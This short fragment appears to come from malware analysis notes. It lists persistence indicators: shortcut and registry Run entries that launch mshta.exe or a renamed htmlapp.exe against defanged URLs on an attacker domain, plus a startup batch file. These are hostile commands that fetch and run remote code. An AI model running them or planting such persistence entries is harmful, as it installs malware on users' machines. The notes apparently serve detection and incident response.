The link place of "RegWrite"
C:\Windows\System32\mshta.exe hxxp://rink74r.info//set_inf2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd
The link place of "SystemBoot"
C:\Users\Cerberus\UserProfile\htmlapp.exe hxxp://rink74r.info//reg2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd
Startup on Registory
HKCU:Run RegWriteaPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd C:\Users\Cerberus\SoftRecovery\dataPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd.bat
Startup User RegWrite.lnk C:\Windows\System32\mshta.exe